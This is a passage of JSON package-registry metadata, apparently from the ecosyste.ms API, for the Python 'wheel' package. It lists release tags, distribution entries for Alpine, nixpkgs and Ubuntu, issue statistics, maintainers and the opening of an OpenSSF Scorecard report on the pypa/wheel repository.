m/pypa/wheel/releases/tag/0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.15.0/manifests"},{"name":"0.13.0","sha":"60fa189589155e43f33587f67eb44bb4fd7d5b58","kind":"commit","published_at":"2012-10-18T00:16:05.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.13.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.13.0/manifests"},{"name":"0.12.0","sha":"2861596953a6ddfb2c4f052a46a2e2b4c5619245","kind":"commit","published_at":"2012-10-06T12:34:19.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.12.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.12.0/manifests"},{"name":"0.11.0","sha":"8dd29d841e15596bc9b5d1c7f7576b2a66113f92","kind":"commit","published_at":"2012-10-06T12:18:46.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.11.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.11.0/manifests"},{"name":"0.10.3","sha":"7021b0ee2a51e5d9447d06038db58e9e597625f7","kind":"commit","published_at":"2012-10-03T22:55:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.3/manifests"},{"name":"0.10.2","sha":"126aaacc9f24fa69b6b74d4e742f645f6bb65cf3","kind":"commit","published_at":"2012-10-03T01:11:35.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.2","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.2/manifests"},{"name":"0.10.1","sha":"92e52e6745ec6b1178c2f42585c2f37ab04902a8","kind":"commit","published_at":"2012-10-01T02:52:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.1/manifests"},{"name":"0.10.0","sha":"9ee6da6d6cab3fa171f2704df5f934474acc4aae","kind":"commit","published_at":"2012-10-01T02:20:04.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.10.0","html_url":"https://github.com/pypa/wheel/releases/tag/0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.10.0/manifests"},{"name":"0.9.7","sha":"a118f5845570ebaf6566b8075dc1dcaf117d7d43","kind":"commit","published_at":"2012-09-20T15:52:36.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.7/manifests"},{"name":"0.9.6","sha":"0c4752551e4fa1d4e9786fc874ae97edf52c0369","kind":"commit","published_at":"2012-09-20T01:46:26.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.6/manifests"},{"name":"0.9.4","sha":"8db2d0d4760a0886998e3fca4206f5db3230d223","kind":"commit","published_at":"2012-09-11T12:32:56.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.4","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.4/manifests"},{"name":"0.9.3","sha":"ca65be72feaf5ebe92ef4c9e91bd722360c1ad2c","kind":"commit","published_at":"2012-09-11T02:38:10.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.3","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.3/manifests"},{"name":"0.9.1","sha":"6952bc635deb0afdf36c5f325aa166636f1c2a52","kind":"commit","published_at":"2012-08-28T23:07:55.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9.1","html_url":"https://github.com/pypa/wheel/releases/tag/0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9.1/manifests"},{"name":"0.9","sha":"49b1d5dac1cdeaf98998b1e5bdb0e2cf134edff3","kind":"commit","published_at":"2012-08-23T03:08:13.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.9","html_url":"https://github.com/pypa/wheel/releases/tag/0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.9/manifests"},{"name":"0.7","sha":"b2930f5f5d3c898389bdbdd7c854a0b9d320cf14","kind":"commit","published_at":"2012-07-28T12:12:45.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.7","html_url":"https://github.com/pypa/wheel/releases/tag/0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.7/manifests"},{"name":"0.6","sha":"bdf9d5747a724664bd3588ab471907a900b45c9a","kind":"commit","published_at":"2012-07-23T16:26:11.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.6","html_url":"https://github.com/pypa/wheel/releases/tag/0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.6/manifests"},{"name":"0.5","sha":"d02f91dceda7c4a16cc26ea80f0eecfff638e4b2","kind":"commit","published_at":"2012-07-17T16:23:12.000Z","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/0.5","html_url":"https://github.com/pypa/wheel/releases/tag/0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pypa/wheel@0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags/0.5/manifests"}]},"repo_metadata_updated_at":"2025-10-30T04:12:38.348Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":12.687646501421376,"forks_count":9.640416936811132,"docker_downloads_count":null,"average":5.582015859558127},"purl":"pkg:apk/alpine/py3-wheel-pyc?arch=x86_64\u0026repository_url=https://pkgs.alpinelinux.org/packages?branch=v3.18","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/alpine/py3-wheel-pyc","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/alpine/py3-wheel-pyc","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/alpine/py3-wheel-pyc/dependencies","status":null,"funding_links":["https://github.com/sponsors/pypa"],"critical":null,"issue_metadata":{"last_synced_at":"2025-10-26T09:45:16.065Z","issues_count":109,"pull_requests_count":184,"avg_time_to_close_issue":48693272.43877551,"avg_time_to_close_pull_request":2636588.9515151517,"issues_closed_count":98,"pull_requests_closed_count":165,"pull_request_authors_count":37,"issue_authors_count":90,"avg_comments_per_issue":5.908256880733945,"avg_comments_per_pull_request":3.5217391304347827,"merged_pull_requests_count":140,"bot_issues_count":0,"bot_pull_requests_count":65,"past_year_issues_count":16,"past_year_pull_requests_count":34,"past_year_avg_time_to_close_issue":238596.63636363635,"past_year_avg_time_to_close_pull_request":890483.8846153846,"past_year_issues_closed_count":11,"past_year_pull_requests_closed_count":26,"past_year_pull_request_authors_count":11,"past_year_issue_authors_count":15,"past_year_avg_comments_per_issue":4.25,"past_year_avg_comments_per_pull_request":3.0588235294117645,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":8,"past_year_merged_pull_requests_count":23,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/issues","maintainers":[{"login":"jaraco","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"},{"login":"woodruffw","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/woodruffw"},{"login":"di","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/di"},{"login":"uranusjr","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/uranusjr"},{"login":"pradyunsg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pradyunsg"},{"login":"mayeut","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mayeut"},{"login":"alex","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alex"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-pyc/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-pyc/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-pyc/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-pyc/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-pyc/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages/py3-wheel-pyc/codemeta","maintainers":[{"uuid":"alice@ayaya.dev","login":null,"name":"psykose","email":null,"url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","packages_count":493,"html_url":"https://pkgs.alpinelinux.org/packages?maintainer=psykose","role":null,"created_at":"2023-05-22T20:58:33.584Z","updated_at":"2023-05-22T20:58:33.584Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers/alice@ayaya.dev/packages"}],"registry":{"name":"alpine-v3.18","url":"https://pkgs.alpinelinux.org/packages?branch=v3.18","ecosystem":"alpine","default":false,"packages_count":20068,"maintainers_count":367,"namespaces_count":2,"keywords_count":3640,"github":"alpinelinux","metadata":{"repos":["main","community"],"funded_packages_count":1185},"icon_url":"https://github.com/alpinelinux.png","created_at":"2023-05-22T10:43:30.622Z","updated_at":"2026-06-10T05:19:44.026Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/alpine-v3.18/namespaces"}},{"id":13209151,"name":"python312Packages.wheel","ecosystem":"nixpkgs","description":"A built-package format for Python","homepage":"https://github.com/pypa/wheel","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["python"],"namespace":null,"versions_count":1,"first_release_published_at":"2026-02-02T01:16:59.447Z","latest_release_published_at":"2026-02-02T01:16:59.447Z","latest_release_number":"0.43.0","last_synced_at":"2026-05-13T06:08:19.453Z","created_at":"2026-02-02T01:16:56.724Z","updated_at":"2026-05-13T06:08:19.454Z","registry_url":"https://search.nixos.org/packages?channel=24.05\u0026query=python312Packages.wheel","install_command":"nix-env -iA nixpkgs.python312Packages.wheel","documentation_url":"https://github.com/NixOS/nixpkgs/blob/nixos-24.05/pkgs/development/python-modules/wheel/default.nix#L35","metadata":{"nix_attribute":"python3.12-wheel-0.43.0","position":"pkgs/development/python-modules/wheel/default.nix:35","platforms":["aarch64-linux","armv5tel-linux","armv6l-linux","armv7a-linux","armv7l-linux","i686-linux","loongarch64-linux","m68k-linux","microblaze-linux","microblazeel-linux","mips-linux","mips64-linux","mips64el-linux","mipsel-linux","powerpc64-linux","powerpc64le-linux","riscv32-linux","riscv64-linux","s390-linux","s390x-linux","x86_64-linux","x86_64-darwin","i686-darwin","aarch64-darwin","armv7a-darwin","i686-cygwin","x86_64-cygwin","x86_64-windows","i686-windows"],"broken":false,"insecure":false,"unfree":false,"outputs":["dist","out"],"upstream_ecosystem":"pypi","upstream_name":"wheel","upstream_purl":"pkg:pypi/wheel"},"repo_metadata":{},"repo_metadata_updated_at":null,"dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:nix/python312Packages.wheel?channel=24.05\u0026repository_url=https://channels.nixos.org/nixos-24.05","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/nixpkgs/python312Packages.wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/nixpkgs/python312Packages.wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/nixpkgs/python312Packages.wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages/python312Packages.wheel/codemeta","maintainers":[{"uuid":"siriobalmelli","login":null,"name":"Sirio Balmelli","email":"sirio@b-ad.ch","url":"https://github.com/siriobalmelli","packages_count":25,"html_url":null,"role":null,"created_at":"2026-03-07T15:07:22.581Z","updated_at":"2026-03-07T15:07:22.581Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers/siriobalmelli/packages"}],"registry":{"name":"nixpkgs-24.05","url":"https://channels.nixos.org/nixos-24.05","ecosystem":"nixpkgs","default":false,"packages_count":116156,"maintainers_count":3383,"namespaces_count":0,"keywords_count":654,"github":"NixOS","metadata":{"funded_packages_count":264},"icon_url":"https://github.com/NixOS.png","created_at":"2026-01-25T22:30:53.309Z","updated_at":"2026-06-09T05:04:49.559Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/nixpkgs-24.05/namespaces"}},{"id":13768187,"name":"wheel","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/pypa/wheel","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/pypa/wheel","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T11:20:53.718Z","latest_release_published_at":"2026-02-13T11:20:53.718Z","latest_release_number":"0.44.0-1","last_synced_at":"2026-03-13T15:16:29.256Z","created_at":"2026-02-13T11:20:53.536Z","updated_at":"2026-03-13T15:16:29.257Z","registry_url":"https://launchpad.net/ubuntu/+source/wheel","install_command":"apt-get install wheel","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python (\u003e= 6), flit, pybuild-plugin-pyproject, python3-all-dev, python3-pytest \u003c!nocheck\u003e, python3-pytest-cov \u003c!nocheck\u003e, python3-sphinx \u003c!nodoc\u003e, tox (\u003e= 4) \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{},"repo_metadata_updated_at":"2026-02-13T11:20:54.381Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/wheel?arch=source\u0026distro=ubuntu-24.10\u0026repository_url=https://launchpad.net/ubuntu/oracular","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/wheel","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/wheel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/wheel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":null,"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/wheel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/wheel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/wheel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/wheel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/wheel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages/wheel/codemeta","maintainers":[],"registry":{"name":"ubuntu-24.10","url":"https://launchpad.net/ubuntu/oracular","ecosystem":"ubuntu","default":false,"packages_count":38437,"maintainers_count":0,"namespaces_count":4,"keywords_count":1473,"github":"ubuntu","metadata":{"codename":"oracular","mirror":"http://old-releases.ubuntu.com/ubuntu","funded_packages_count":214},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:48.028Z","updated_at":"2026-06-10T05:17:05.787Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-24.10/namespaces"}},{"id":13728514,"name":"wheel","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/pypa/wheel","licenses":"mit","normalized_licenses":["MIT"],"repository_url":"https://github.com/pypa/wheel","keywords_array":["universe/misc"],"namespace":"universe","versions_count":1,"first_release_published_at":"2026-02-13T01:59:22.413Z","latest_release_published_at":"2026-02-13T01:59:22.413Z","latest_release_number":"0.42.0-2","last_synced_at":"2026-03-13T06:10:11.260Z","created_at":"2026-02-13T01:59:22.190Z","updated_at":"2026-03-13T06:10:11.261Z","registry_url":"https://launchpad.net/ubuntu/+source/wheel","install_command":"apt-get install wheel","documentation_url":null,"metadata":{"component":"universe","architecture":"all","priority":"optional","binary":"python3-wheel, python-wheel-common, python3-wheel-whl","standards_version":"4.6.2","maintainer":"Debian Python Team \u003cteam+python@tracker.debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python (\u003e= 6), flit, pybuild-plugin-pyproject, python3-all-dev, python3-pytest \u003c!nocheck\u003e, python3-pytest-cov \u003c!nocheck\u003e, python3-sphinx \u003c!nodoc\u003e, tox (\u003e= 4) \u003c!nocheck\u003e","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":23174547,"uuid":"98346885","full_name":"pypa/wheel","owner":"pypa","description":"The official binary distribution format for Python","archived":false,"fork":false,"pushed_at":"2026-01-22T12:39:15.000Z","size":1854,"stargazers_count":548,"open_issues_count":13,"forks_count":174,"subscribers_count":30,"default_branch":"main","last_synced_at":"2026-02-07T09:12:07.710Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/pypa.png","metadata":{"files":{"readme":"README.rst","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.txt","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null}},"created_at":"2017-07-25T20:24:25.000Z","updated_at":"2026-01-31T21:22:34.000Z","dependencies_parsed_at":"2026-01-29T00:01:21.253Z","dependency_job_id":null,"html_url":"https://github.com/pypa/wheel","commit_stats":{"total_commits":913,"total_committers":82,"mean_commits":"11.134146341463415","dds":0.6297918948521358,"last_synced_commit":"baf6bf89562cb42a0ca71cc1e804600b161952eb"},"previous_names":[],"tags_count":70,"template":false,"template_full_name":null,"purl":"pkg:github/pypa/wheel","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/pypa","download_url":"https://codeload.github.com/pypa/wheel/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pypa%2Fwheel/sbom","scorecard":{"id":751706,"data":{"date":"2025-08-11","repo":{"name":"github.com/pypa/wheel","commit":"15b7577654e8bcd23e009c6bac036b65c11d8d8f"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5,"checks":[{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:18: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/publish.yml:50: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:52: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/publish.yml:56: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:31: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/pypa/wheel/test.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/publish.yml:23","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:41","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:43","Warn: pipCommand not pinned by hash: .github/workflows/test.yml:46","Info:   0 out of   7 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned","Info:   0 out of   4 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Maintained","score":1,"reason":"1 commit(s) and 1 issue activity found in the last 90 days -- score normalized to 1","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Code-Review","score":2,"reason":"Found 8/27 approved changesets -- score normalized to 2","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': 